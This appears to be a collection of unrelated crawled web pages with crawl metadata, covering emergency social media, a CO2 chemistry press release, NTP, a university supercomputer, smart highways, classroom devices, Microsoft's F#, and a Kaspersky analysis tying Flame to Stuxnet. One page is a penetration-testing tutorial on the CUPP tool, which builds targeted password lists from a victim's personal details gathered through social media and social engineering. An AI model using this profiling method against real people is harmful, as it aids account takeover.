Representatives from the American Red Cross, Centers for Disease Control and Prevention, Federal Bureau of Investigation, Federal Emergency Management Agency, and U.S. Department of Health and Human Services participated in discussions that included innovative best practices, common pitfalls, lessons learned, and informative back stories, and recommended next steps for using social media.
The discussions were summarized in a post-conference report and a series of video podcasts of speaker presentations. The presentations vividly illustrate how widgets, YouTube, Flickr, Twitter, and other social media tools are being used to improve emergency communications, and explain the critical role these tools played in events such as the 2008 attacks on Mumbai and 2009 salmonella-related peanut recall. The report also included:
- Outcomes from break-out sessions on core social media challenges related to public – private partnerships, evaluation, metrics, resource requirements, and social media communication strategies
- Survey results on organizational uses of social media in times of crisis
- Tips on how to implement social media for emergency communications
- A guide to establishing social media best practices
- A social media primer describing the portfolio of social media tools
Principal Grant McLaughlin, senior associate Tim Tinker, and senior consultant Michael Dumlao led Booz Allen’s team of round table organizers, speakers, and break-out session facilitators.
study posted July 23, 2009
- How Web 2.0 Is Changing Responses to Emergencies — Booz Allen's Tim Tinker and Grant McLaughlin talk to Federal News Radio about social media's role in crisis communication and how government agencies can use social media tools. The interview aired on August 25, 2009.
- Risk and Crisis Communications: Best practices for Government agencies and Non-profit organizations. | <urn:uuid:92a59b73-c97c-4153-a46a-cfcfebb78909> | CC-MAIN-2017-04 | http://www.boozallen.com/insights/2009/07/42420696 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00491-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.903736 | 642 | 2.984375 | 3 |
MONMOUTH JUNCTION, NJ--(Marketwired - Mar 5, 2014) - Liquid Light unveiled its new process for the production of major chemicals from carbon dioxide (CO2), showcasing its demonstration-scale 'reaction cell' and confirming the potential for cost-advantaged process economics. Because carbon dioxide -- a greenhouse gas -- is low-cost and readily available worldwide, Liquid Light's customers can profit by producing high-value chemicals from CO2 'waste'; reduce their dependence on oil; and potentially reduce their carbon footprint.
Liquid Light's first process is for the production of ethylene glycol (MEG), with a $27 billion annual market, which is used to make a wide range of consumer products such as plastic bottles, antifreeze and polyester clothing. Liquid Light's technology can be used to produce more than 60 chemicals with large existing markets, including propylene, isopropanol, methyl-methacrylate and acetic acid.
Making electrocatalytics practical for harnessing carbon dioxide as an alternative feedstock
Liquid Light's core technology is centered on low-energy catalytic electrochemistry to convert CO2 to chemicals, combined with hydrogenation and purification operations. By adjusting the design of their catalyst, Liquid Light can produce a range of commercially important multi-carbon chemicals. Additionally, by using 'co-feedstocks' along with CO2, a plant built with Liquid Light's technology may produce multiple products simultaneously.
Liquid Light's advances that enable commercialization include the development of long-lasting catalyst components; the ability to run continuously for extended times; and major progress in energy efficiency.
Promising economics from low-cost feedstock and proven-efficient process
Results to date highlight promising economics in three key dimensions:
1. Process performance validated at lab scale: In test runs, Liquid Light has met the targets needed for cost-advantaged production in metrics including energy needed per unit of output; rate of production; yield; and stability/longevity of cell components.
2. Large savings in feedstock costs: Liquid Light's process requires $125 or less of CO2 to make a ton of MEG. Other processes require an estimated $617 to $1,113 of feedstocks derived from oil, natural gas or corn. These differences are especially significant as MEG sells for $700 to $1,400 per metric ton.
3. High project value for technology licensees: Current estimates show that a 400kT per year Liquid Light MEG plant would offer more than $250 million in added project value as compared to a plant built using the best currently available process technology. A 625kTa plant would have a 15 year net present value of over $850 million to a licensee.
Liquid Light's process: Reduction in carbon footprint for chemical production
Liquid Light's process also reduces the overall carbon footprint for chemical production compared to conventional methods, when powered with electricity produced from natural gas, nuclear, advanced coal and renewable sources. Further, Liquid Light's process can sequester carbon -- meaning it is a net reducer of carbon in the environment -- when using energy sources like solar, hydro, wind or nuclear power. To further demonstrate this potential benefit, the company also showed the process can be powered by intermittently-available renewable energy sources like solar and wind. The result is that chemicals can be made directly from renewable energy sources and CO2.
"We're delighted to be introducing a new and valuable alternative for the mainstream chemical industry," said Kyle Teamey, CEO of Liquid Light. "Liquid Light's technology offers a new and cost-effective way to make everyday products from plain old carbon dioxide. This is a great way to reduce our dependence on fossil fuels while we simultaneously consume an environmental pollutant."
About Liquid Light
Liquid Light develops and licenses process technology to make major chemicals from low-cost, globally-abundant carbon dioxide (CO2). Customers profit from a lower cost of production, while harnessing their current waste stream; reduce their dependence on cyclically-priced petroleum feedstocks; and can reduce their carbon footprint.
Liquid Light's first process is for the production of ethylene glycol (MEG), with a $27 billion annual market. Results consistent with cost-advantaged production have been validated at lab scale for key parts of our process; and the process scales in a predictable manner, akin to world-scale chlor-alkali plants.
Liquid Light's core technology is centered on low-energy catalytic electrochemistry to convert CO2 to multi-carbon chemicals. It is backed by more than 100 patents and applications, and extends to multiple chemicals with large existing markets, including ethylene glycol, propylene, isopropanol, methyl-methacrylate and acetic acid.
Liquid Light's investors include VantagePoint Capital Partners, BP Ventures, Chrysalix Energy Venture Capital, and Osage University Partners. | <urn:uuid:8d8f3188-af16-4bb7-9b44-d9f4861b4a2a> | CC-MAIN-2017-04 | http://www.marketwired.com/press-release/liquid-light-unveils-cost-advantaged-catalytic-process-to-make-chemicals-from-co2-1885590.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00519-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.919846 | 1,010 | 2.734375 | 3 |
NTP: It's About Time
Perhaps one of the most overlooked elements of network management is that of time synchronization. If its importance in the overall health of the network were better understood, then perhaps it would be paid more attention. In this article, I'll discuss time synchronization and the Network Time Protocol.
Why Synchronization Matters
In a local area network (LAN), time synchronization is important because it affects components such as file systems and applications. If the time being issued to the server by the system hardware clock is incorrect, it is quite possible for corruption to occur within applications, particularly in complex systems such as databases. In wide area networks (WANs), time synchronization is even more essential. The distributed nature of WANs greatly increases the probability of an incorrect timestamp, not to mention the fact that WANs often span time zones, further complicating the issue.
One of the best (and most used) examples of the importance of time synchronization is that of e-mail. Imagine receiving an e-mail, the timestamp of which indicates that it was received before it was sent. Very confusing. Another more frightening example includes the computers used by air traffic controllers, but we won't even go there. So, how does an operating system get the wrong time?
For the most part, operating systems take their time from the local hardware clock of the system on which they are loaded. Although hardware clocks have improved in terms of accuracy and reliability, they are still prone to inaccuracies. In addition, the one-to-one relationship of the operating system and the machine on which it is running means that it is very possible for two different systems on a network to have different times. What is needed is a mechanism that allows systems to synchronize themselves with a reliable time source and subsequently with each other. The mechanism is the Network Time Protocol (NTP).
Guidelines pertaining to the use of Network Time Protocol time sources are available on the Internet. A document describing these Rules of Engagement, along with a list of public time servers, can be found here.
NTP operates over UDP on port 123. If you're using a firewall, you may need to change the firewall configuration so that NTP traffic can flow through.
Network Time Protocol
NTP is not a new protocol; in fact, it's been around since the 1980s. The current version of NTP, version 4, is relatively new, and previous versions are still well supported. Great care is taken to ensure that new versions of NTP are backward compatible. The generic nature of NTP means that it is platform independent, and NTP support is available for almost all popular platforms including Linux, Unix, Windows NT/2000, Novell NetWare, Windows 95/98, Mac, as well as other networking devices such as routers. There is even a version for Palm! In many cases, shareware and freeware versions of NTP server and client software are available. Some of these use the lighter Simple NTP (SNTP) protocol, which is based on standard NTP but has less overhead.
Before time can be synchronized by NTP, the correct time must first be ascertained. One of the most popular methods of obtaining this information is from Internet-based public time servers. The servers are structured in a tiered model, with those at the top tier designed to be the most accurate. These top-level Internet time servers are known as Primary, or Stratum-1, time servers. Stratum-1 servers provide accurate time by synchronizing with reliable sources such as the Global Positioning System or purpose-specific radio broadcasts. To ensure that these Primary time servers are not overwhelmed with requests, a number of other servers are also configured as Secondary, or Stratum-2, time servers. Although there may be small differences in time between the Stratum 1 and 2 servers, the possible change is limited and makes no difference to most networks.
The specifics of setting up time synchronization and using NTP on a system will depend on the platform(s) you are using. In most instances, setup is simply a case of installing (and if necessary compiling) the NTP software, loading it, and pointing it at a reliable time source. Depending on how many other devices you want to synchronize, you can then configure NTP on other devices to also point to the reliable time source, or to the original server that is receiving time. In turn, other servers can be configured to receive time from these other servers, creating a stratum model of your own.
The question of which time source to point to is an interesting one. As with many things related to the Internet, time servers are maintained, added to, and amended by people and organizations on a voluntary basis. As such, neither the availability nor the accuracy of the servers and/or service is guaranteed. It would be easy to assume that the Stratum-1 time sources are completely accurate, but it's not always the case. A survey conducted by individuals at MIT in 1999 found that a large number of the Stratum-1 servers were issuing the wrong timein one case, by over six years!
Setting Up NTP
Setting Up an NTP Time Server
Synchronizing your systems with one of these public time servers may be appropriate if all your systems have access to a public NTP time server, but in practicality it may not be possible. A more reliable, secure, and self-sufficient option is to create a reference time server of your own, and then use it to provide time to servers across your enterprise. To create an NTP time server, you will first need a mechanism for ascertaining accurate time, such as a radio receiver or GPS time receiver. These devices commonly come as either plug-in expansion cards or as external devices that plug into the RS-232 port on the system in question. Prices start at a few hundred dollars and go up from there. Using these devices, the local clock on the system is kept accurate. NTP software can then be used to communicate this time to the operating system and other servers.
Although time serving is designed to be a low-overhead service, if you have many clients who will require synchronization, consider creating a dedicated time server or purchasing a purpose-made time server in a box system. The only drawback is that these can easily cost in excess of $5,000. This strategy may sound expensive, but when you consider the money often invested in other areas of network management and resilience, it is still quite reasonable.
As systems become more and more distributed, the importance of having accurate time across the enterprise will increase accordingly. Network Time Protocol fulfills this need in a relatively simple and easy to implement manner. //
Drew Bird (MCT, MCNI) is a freelance instructor and technical writer. He has been working in the IT industry for 12 years and currently lives in Kelowna, B.C., Canada. You can e-mail Drew at firstname.lastname@example.org. | <urn:uuid:0017ee08-3721-49cf-b9ac-c4c1a1e09ebb> | CC-MAIN-2017-04 | http://www.enterprisenetworkingplanet.com/print/netsysm/article.php/625401/NTP-Its-About-Time.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00335-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.951888 | 1,437 | 3.15625 | 3 |
Dec. 13 — A £2 million investment has increased the capability and power of the state-of-the-art BlueCrystal High Performance Computer (HPC) facility, which allows over 650 researchers and students to process vast amounts of complex data at record speeds.
Supercomputers are seen as the ‘third pillar’ of modern research and within the University are used in areas such as climate research, earth science, drug discovery, mathematics, physics, molecular modelling and aerospace engineering.
The University has invested £12 million in its Advanced Computing facilities since 2006, making it one of the country’s leading centres.
The latest BlueCrystal system will be five times as powerful as its predecessor and the upgrade is a result of a collaboration with ClusterVision and Dell.
Dr. Ian Stewart, Director of the University’s Advanced Computing Research Centre, said, “This new machine underscores the far-sighted commitment to HPC by the University and reinforces Bristol’s position as one of the leading centres for HPC in the UK.”
“It will provide the robust, scalable and innovative platform required to meet the diverse interests and requirements of our world class research community. Having a supercomputer of this size contributes significantly to University research income and will play an increasingly important role in teaching.”
Major users include climatologists in the School of Geographical Sciences who are developing models to predict climate change. These models require huge amounts of computing power and disk space, with a typical simulation taking months to run and generating terabytes of model output.
Such models will help to identify where in the world may be at the highest risk of flooding. It also contributes to the ability of climate scientists to monitor ice sheets in the Antarctic.
Another important area of research which will benefit from the HPC’s capabilities is Social and Community Medicine, with the globally recognised Children of the 90s long-term health research project increasingly needing to analyse vast quantities of data collected from the 14,000 mothers enrolled during pregnancy in 1991 and 1992 and their resulting family.
It’s hoped that the new supercomputer will be a resource for the whole city, with opportunities for small businesses and schools to have access.
Furthermore, the University has been working alongside its partners to offer new opportunities to students, plugging the current skills gap in HPC through internships, placements, sponsorship and guest lectures.
ClusterVision has supplied, delivered and installed the Dell based system with other elements sourced from a variety of vendors including Bright Computing, Intel, NVIDIA, Panasas and Allinea.
Mark Allsopp, UK Country Manager for ClusterVision, said, “ClusterVision is proud to build on our long relationship with the University of Bristol’s Advanced Computing Research Centre. We look forward to working with the University to continue exploring how the latest technology in computing, storage and software can be brought together to provide a significant computational and scientific advantage for the University of Bristol and the wider South West region.”
Dr Stephen Wheat, Intel’s General Manager for HPC, said, “Intel is delighted to be chosen as the supplier of choice for the University of Bristol’s new BlueCrystal High Performance Computer. Bristol and Intel have a strong and positive history on the deployment of Xeon processor based systems to meet Bristol’s extreme computing demands.”
“Bristol’s choice to base their next generation computational workhorse on the latest Intel Xeon E5-2600 processor and Intel Xeon Phi co-processor, all interconnected with Intel True Scale fabric, provides a state-of-the-art multi-core and many-core computing platform to extend their positive experience well into the future with Intel Inside.”
David Lecomber, CEO of Allinea Software, said, “The BlueCrystal system provides a platform that will deliver breakthrough results through the development of advanced software models and we are delighted that our software tools and training will be a part of enabling this progress.”
Bart Mellenbergh, Director of HPC Solutions in EMEA at Dell, said, “The University of Bristol is an important partner for Dell in the UK high-performance technical computing space. We will work with the University to help their students to better develop their skills in HPC and achieve success.”
“Dell will also support the University’s initiatives to make HPC accessible to the mid-market segment of UK industry. We are extremely excited about teaming the University’s students, energy and knowhow and Dell’s technology and market reach to make a positive impact on the UK high-tech economy.”
Source: University of Bristol | <urn:uuid:e8cdeb4a-3311-47e4-9a4b-1d4c928b6c35> | CC-MAIN-2017-04 | https://www.hpcwire.com/off-the-wire/bristol-utilize-bluecrystal-system-research/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00335-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.930455 | 972 | 2.515625 | 3 |
There are a lot of social engineering techniques that you can try in order to retrieve personal information from users that can help you to identify their passwords.However people have different personalities like many people are not willing to talk to strangers about the so as penetration tester that performs social engineering attacks you may find some obstacles.
Not all the people are open for discussions so there will be times that you may unable to retrieve the information that you want.So the only thing that you can do is to have a good password list related to the interests of this person.
The aim of the CUPP is to generate common passwords based on the input that you will give for your target.For example:
- Pet name
Of course these information could be found on the social profiles of the victims like Facebook,Twitter,Linkedin etc.
To start CUPP you need to execute the commands below:
You can see in the image below the options that you have when you start the program:
When we have as much information as possible for the interests,names,nicknames,hobbies etc of our victim it is time to use the cupp in order to fill in the information that we have for the creation of the password list.
Except of the information you can choose also if the list will include and leet words or random numbers at the end of the words,special characters and keywords.
Now the CUPP has generate the password list and we can use it in order to see if any password on the list is valid.
Most common passwords are birthdays,names,interests,mobile numbers and generally events from people’s real life.The reason behind that is of course that people need to use something that they can remember especially in nowadays that everyone possess many accounts.
CUPP proves that sharing details in the social media or with someone who is not your friend could be dangerous.Besides social engineering is a very effective way for malicious users to discover passwords fast so it is a very common attack.
So every user must know that the choice of the passwords is very important and something that needs constantly evaluation.CUPP generates passwords from users social life so in order to avoid having our password to someone’s CUPP wordlist we can share false information to the social media or we should choose passwords that are irrelevant from our real life events. | <urn:uuid:123446b9-6911-4914-97fe-539547f369dc> | CC-MAIN-2017-04 | https://pentestlab.blog/2012/03/06/common-user-passwords-profiler/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00061-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.941652 | 483 | 2.78125 | 3 |
Two Dutch design firms are developing a “Smart Highway” to test new technologies that could someday become common parts of roadway infrastructure around the world, Gizmag reported.
The test site, developed by Studio Roosegaarde and Heijmans Infrastructure, features roads with glow-in-the-dark paint, dynamic lighting and lanes that can charge electric cars.
There are five main new technologies that will be used to create the “Route 66 of the future,” according to the firms. “Dynamic Paint” is temperature sensitive paint that is transparent most of the time, but when it becomes cold enough to create hazards like black ice, the paint reveals warning symbols on the road.
Glow-in-the-dark paint, which absorbs energy from the sun and can glow in the dark for up to 10 hours, would replace reflective or ordinary paint used to form lanes on most roads.
Interactive lighting uses sensors to detect when vehicles approach. The difference between these sensors and those already found on the roads in some places is that the brightness of the light can adjust based on how far away a car is from the light, growing brighter as a car approaches and dimmer as a car leaves. Similarly, a “wind light” uses the wind created by a moving vehicle to power pinwheel generators connected to road lights.
An “induction priority lane” for electric cars uses underground induction coils to charge vehicles as they drive down the lane. A prototype of the road is expected to be operational sometime in 2013.
All images courtesy of Studio Roosegaarde | <urn:uuid:fd10ddb8-6acf-4681-ad2f-ca0293ccc294> | CC-MAIN-2017-04 | http://www.govtech.com/transportation/Smart-Highways-Glow-in-the-Dark.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00363-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.946723 | 325 | 2.9375 | 3 |
The discovery of the Flame malware in May 2012 revealed the most complex cyber-weapon to date. At the time of its discovery, there was no strong evidence of Flame being developed by the same team that delivered Stuxnet and Duqu. The approach to the development of Flame and Duqu/Stuxnet was different as well, which lead to the conclusion that these projects were created by separate teams. However, the following in-depth research, conducted by Kaspersky Lab’s experts, reveals that these teams in fact cooperated at least once during the early stages of development.
- Kaspersky Lab discovered that a module from the early 2009-version of Stuxnet, known as “Resource 207,” was actually a Flame plugin.
- This means that when the Stuxnet worm was created in the beginning of 2009, the Flame platform already existed, and that in 2009, the source code of at least one module of Flame was used in Stuxnet.
- This module was used to spread the infection via USB drives. The code of the USB drive infection mechanism is identical in Flame and Stuxnet.
- The Flame module in Stuxnet also exploited a vulnerability which was unknown at the time and which enabled escalation of privileges, presumably MS09-025.
- Subsequently, the Flame plugin module was removed from Stuxnet in 2010 and replaced by several different modules that utilized new vulnerabilities.
- Starting from 2010, the two development teams worked independently, with the only suspected cooperation taking place in terms of exchanging the know-how about the new “zero-day” vulnerabilities.
Stuxnet was the first cyber-weapon targeting industrial facilities. The fact that Stuxnet also infected regular PCs worldwide led to its discovery in June 2010, although the earliest known version of the malicious program was created one year before that. The next example of a cyber-weapon, now known as Duqu, was found in September 2011. Unlike Stuxnet, the main task of the Duqu Trojan was to serve as a backdoor to the infected system and steal private information (cyber-espionage).
During the analysis of Duqu, strong similarities were discovered with Stuxnet, which revealed that the two cyber-weapons were created using the same attack platform known as the “Tilded Platform”. The name originated from the preferences of the malware developers for filenames of the form “~d*.*” – hence, “Tilde-d”. The Flame malware, discovered in May 2012 following the investigation prompted by International Communications Union (ITU) and conducted by Kaspersky Lab, was, at first sight, entirely different. Some features, such as the size of the malicious program, the use of LUA programming language and its diverse functionality all indicated that Flame was not connected to Duqu or Stuxnet’s creators. However, the new facts that have emerged completely rewrite the history of Stuxnet and prove without a doubt, that the “Tilded” platform is indeed connected to the Flame platform.
The earliest known version of Stuxnet, supposedly created in June 2009, contains a special module known as “Resource 207”. In the subsequent 2010 version of Stuxnet this module was completely removed. The “Resource 207” module is an encrypted DLL file and it contains an executable file that’s the size of 351,768 bytes with the name “atmpsvcn.ocx”. This particular file, as it is now revealed by Kaspersky Lab’s investigation, has a lot in common with the code used in Flame. The list of striking resemblances includes the names of mutually exclusive objects, the algorithm used to decrypt strings, and the similar approaches to file naming.
More than that, most sections of code appear to be identical or similar in the respective Stuxnet and Flame modules, which leads to the conclusion that the exchange between Flame and the Duqu/Stuxnet teams was done in a form of source code (i.e. not in binary form). The primary functionality of the Stuxnet “Resource 207” module was distributing the infection from one machine to another, using the removable USB drives and exploiting the vulnerability in Windows kernel to obtain escalation of privileges within the system. The code which is responsible for distribution of malware using USB drives is completely identical to the one used in Flame.
Alexander Gostev, Chief Security Expert, Kaspersky Lab, comments: “Despite the newly discovered facts, we are confident that Flame and Tilded are completely different platforms, used to develop multiple cyber-weapons. They each have different architectures with their own unique tricks that were used to infect systems and execute primary tasks. The projects were indeed separate and independent from each other. However, the new findings that reveal how the teams shared source code of at least one module in the early stages of development prove that the groups cooperated at least once. What we have found is very strong evidence that Stuxnet/Duqu and Flame cyber-weapons are connected”.
Further details about the investigation can be found in the article at Securelist.com. To learn more about Flame malware refer to the Flame FAQ prepared by Kaspersky Lab’s security researchers. | <urn:uuid:c2cbaa95-4e33-4bfb-a96e-9ca737adffd1> | CC-MAIN-2017-04 | http://www.kaspersky.com/au/about/news/virus/2012/Resource_207_Kaspersky_Lab_Research_Proves_that_Stuxnet_and_Flame_Developers_are_Connected | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00299-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.964872 | 1,095 | 2.703125 | 3 |
Just four years ago most schools had policies against devices in classrooms. The typical way for teachers to deal with smartphones and devices was banning their usage in class. School policy was to force students to leave phones and iPads at the door of the classroom so as not to disrupt lessons or other students. It was a fearful subject for teachers to address. How would teachers know what students were doing on their phones? How would they keep kids engaged in learning when they could access the internet, facebook, and text their friends?
Even more frustrating was the fact that unless smart phones and other devices were confiscated upon the start of class, students would continuously try to sneak peeks at their phones at all times of the day. This posed even further disruption to learning. Fast forward to 2015 – students are not only allowed to have their own devices, Chromebooks and iPads are given to them for classroom use! OR, even more crazy options are enlisted such as allowing students to bring in their own devices for classroom use and mandating that they be incorporated into classroom instruction. A lot has changed!
It takes years of experience for teachers to nail down lesson plans that engage students while incorporating the required course curriculum, competencies, and instructional benchmarks. Perfecting a lesson that engages students, teaches effectively, and produces good results is no easy feat. Teachers don’t have time to revise tried and true means of lesson delivery to include the use of internet-connected devices. But that is what is happening in schools today as districts are adopting BYOD policies and buying up Chromebooks in droves.
If your district has adopted BYOD policies or purchased a gaggle of iPads for student use, here are some helpful resources to assist teachers in coping with the intrusiveness of these new technology happenings:
Device inclusive lesson plans
One of the biggest issues that teachers have with having a classroom full of smartphone touting students is altering their lesson plans to include the usage of them. Adjusting lessons to include new activities takes time, and goodness knows time is at a premium for teachers. To help with this districts can compile a list of resources available for teachers to work from to revise lesson plans to include technology. Here are some examples:
A strong IT maintenance policy
In order for teachers to feel comfortable with the usage of Chromebooks, iPads, smartphones and other handheld devices in their classrooms it is imperative that school districts set up an ironclad IT maintenance policy. Teachers need to know that there are resources for properly maintaining the devices that are now incorporated into their lessons. Nothing is more frustrating than beginning a lesson only to have 3 or 4 students with devices that aren’t working. This can cause distractions that are nearly impossible to defuse.
To alter maintenance policies to include BYOD and handheld devices, IT departments need to:
Getting parent buy in
The more parents know about school technology usage for learning, the better. Give parents as much information as possible about why and what technology items students are using, how they are using it, and what parents can do to reinforce technology learning, rules and resources with their children. If technology usage at home is congruent with the classroom there are less headaches for all.
When implementing new devices in classrooms many public schools are creating technology education portals on their websites for parents access such as these:
Educating students on proper usage
Especially in schools that purchase personal technology devices, educating students on proper usage is of utmost importance. The more students are educated on why and how devices can be used to properly enhance education, the better the experience will be. Don’t assume that students know how to use a device. On average children are 12 years old when they receive their first smartphone from parents. But schools are providing iPads and Chromebooks to children younger than that on a regular basis these days. This means that there are many children who are only getting access to devices in the classroom. They need to learn how to use them properly for learning so that there are as few distractions as possible due to improper use.
Device monitoring solutions
Perhaps the most encompassing of all needs to reduce the intrusiveness of personal technology devices in the classroom is the ability to monitor what each student is doing on said device at all times. Providing teachers with the peace of mind that students’ activities on smartphones, laptops and tablets allows them to focus on the most important of tasks; engaging students in learning. Having software running in the background that logs websites, apps, and conversations going on gives teachers the freedom to keep on teaching without continuously looking over students shoulders. This is probably the single most important key to implementing devices into every classroom. Impero Education Pro is a great solution for monitoring devices of all kinds. Contact us for more information on our classroom management solutions. | <urn:uuid:c14e5c9a-42b7-432c-b761-b6950d8ccf19> | CC-MAIN-2017-04 | https://www.imperosoftware.com/5-ways-to-help-teachers-cope-with-the-intrusiveness-of-devices-in-the-classroom/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281331.15/warc/CC-MAIN-20170116095121-00537-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.972281 | 965 | 3.140625 | 3 |
7.5 What is a fail-stop signature scheme?
A fail-stop signature scheme is a type of signature devised by van Heyst and Pederson [VP92] to protect against the possibility that an enemy may be able to forge a person's signature. It is a variation of the one-time signature scheme (see Question 7.7), in which only a single message can be signed and protected by a given key at a time. The scheme is based on the discrete logarithm problem. In particular, if an enemy can forge a signature, then the actual signer can prove that forgery has taken place by demonstrating the solution of a supposedly hard problem. Thus the forger's ability to solve that problem is transferred to the actual signer.
The term ``fail-stop'' refers to the fact that a signer can detect and stop failures, that is, forgeries. Note that if the enemy obtains an actual copy of the signer's private key, forgery cannot be detected. What the scheme detects are forgeries based on cryptanalysis.
- 7.1 What is probabilistic encryption?
- Contribution Agreements: Draft 1
- Contribution Agreements: Draft 2
- 7.2 What are special signature schemes?
- 7.3 What is a blind signature scheme?
- Contribution Agreements: Draft 3
- Contribution Agreements: Final
- 7.4 What is a designated confirmer signature?
- 7.5 What is a fail-stop signature scheme?
- 7.6 What is a group signature?
- 7.7 What is a one-time signature scheme?
- 7.8 What is an undeniable signature scheme?
- 7.9 What are on-line/off-line signatures?
- 7.10 What is OAEP?
- 7.11 What is digital timestamping?
- 7.12 What is key recovery?
- 7.13 What are LEAFs?
- 7.14 What is PSS/PSS-R?
- 7.15 What are covert channels?
- 7.16 What are proactive security techniques?
- 7.17 What is quantum computing?
- 7.18 What is quantum cryptography?
- 7.19 What is DNA computing?
- 7.20 What are biometric techniques?
- 7.21 What is tamper-resistant hardware?
- 7.22 How are hardware devices made tamper-resistant? | <urn:uuid:95751c24-03f5-4781-a81c-35748b6d7ede> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/what-is-a-fail-stop-signature-scheme.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00353-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.903868 | 518 | 2.9375 | 3 |
Selmi H.,Departement des science et Techniques des Productions Animales |
Rekik B.,Departement des science et Techniques des Productions Animales |
Dkhil A.,Institute Of Recherche Veterinaire Of Tunisie |
Gara A.B.,Departement des science et Techniques des Productions Animales |
And 3 more authors.
Livestock Research for Rural Development | Year: 2010
The improvement of sheep production systems in the Fahs region necessitates a diagnosis of the current situation and a thorough analysis of management practices. To meet these objectives, 110 farms having the Barbarine meat breed from the region were surveyed. The analysis of gathered data revealed that the region is characterized by familial farming (91.8% of farms are small sized: 0 to 24.7 acres) held by middle age farmers (45.5% were 35 to 55 years old) of which 80% are illiterate or at most have attended primary school). The total sample size of animal was 2059. Animals were lodged in traditional and are mostly fed on pasture and by-products, and supplemented occasionally by concentrate during critical physiological stages. The overall management of the Barbarine breed seemed unsatisfactory with indicators below common accepted performances. In fact, 80% of farmers practice shearing on pregnant ewes, a long breeding period without the ram effect, and do not respect the sex- ratio. The lambing period was then unnecessary long (July-December) with a peak in October (53.6%). The analysis of reproduction performances showed that farms may be classified into two categories: The first class of 19% of herds had 90%, 9.23% and 14.4% rates for fertility, sterility and abortion, respectively; and the second class with 113, 108 and 9.23 for prolificacy, fecundity and young mortality, respectively. Net income varied from 18.4 TD to 126 DT/ewe indicating important differences in management practices among farmers. Source | <urn:uuid:9a340d4f-adb5-4dda-931a-d8e9d84b3d0f> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/departement-des-science-et-techniques-des-productions-animales-1632101/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00197-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.920887 | 408 | 2.578125 | 3 |
Called F#, the meta language is designed to solve extensibility issues and problems on the .NET Framework. Meta languages are used for writing tools and compilers, programs that translate source code into object code, or a computer's machine language.
CAML, from which F# is derived, is a meta language that was developed by INRIA, a French research institute for computer science. One type of CAML is Objective CAML, which is used for teaching programming.
F# was forged to address those problems for .NET programmers. The language, written by Don Syme, of Microsoft Research's Cambridge, U.K., team, joins the software giant's family of programming languages, including C++, C# and J#.
"I believe that it is reasonable to innovate with syntax and semantics in order to increase the usability of a programming language," Syme said on the Microsoft research site.
As is common with new programming languages, debate was widespread and fierce on developer-oriented sites as Slashdot.org. One argument is that functional compilers already exist on the market to convert Standard ML onto the .NET framework, such as SML.NET. But Microsoft contends that it wants to make F# work seamlessly with C#, Visual Basic, SML.NET and other .NET programming languages.
The notion that Microsoft is standardizing another language, as it has with C++ and C#, is the major source of contention for those who have come to distrust Microsoft in the wake of antitrust concerns that came to a head in U.S. courts a few years ago.
One anonymous slashdot poster, distressed by the news, said: "I guess anyone taking computer science will have to learn this, as it is the 'language of the future.' MS has the power to dictate what the future of its monopoly is, and thus also the future of computing. And with computer science graduates familiar with this, they will start to use it. Then, others like myself will either have to learn it or lose their job."
Another rebutted that tack: "F# will be learned by people when managers and not university lecturers decide that it is something that coders need to learn or even when coders decide it's necessary for something. Stop thinking that the world is out to make you use MS products no matter what. The businesses that do the employment and the people who should be advising them (cough -you- cough) are the people who make those decisions."
Microsoft could not be reached for comment as of press time, but analysts familiar with Microsoft's adventures in programming discussed the issue. Stephen O'Grady, of Redmonk, considered the possibility that Microsoft's purpose may be less than altruistic, but downplayed it.
"Does Microsoft intend to modify ML for its own purposes? Sure, but some would call that optimizing for the platform and the framework," O'Grady said. "People do this all the time -- SAP in the past has added its own custom classes to JSP libraries, and BEA introduced a proprietary format for its Workshop product in the .JWS extension (although the latter's been submitted as a standard to the JCP). And as for C++ and C#, I haven't noticed that they exactly put C out of business."
O'Grady said it is possible that developers may have to get used to Microsoft's version of meta language in F#.
"But I'd say that's not exactly a near horizon threat. Plus it's likely that if it becomes perceived as a threat, the Java community will develop CAML or Standard ML plugins to something like the Eclipse framework, if in fact they're not available already."
ZapThink Senior Analyst Ronald Schmelzer was less concerned about Microsoft's intentions. He noted that Microsoft is known for doing research on a variety of topics that may never see the light of day as a product, and "this might be one of them."
"However, I don't think there is cause for alarm here. Microsoft was one of the original creators of XML, and things like SOAP and BPEL, so why would they dump it? By and large, this looks to be a focused research project by an individual or a small group exploring the topic of how to produce better compiled languages. I don't see any indication that this would replace C, C#, C++, Java, or any other language that Microsoft supports. In fact, the Microsoft CLR that forms the basis of the .NET runtime explicitly supports things like new languages and F# might just be one of those."
But does the programming world need another # language from Microsoft?
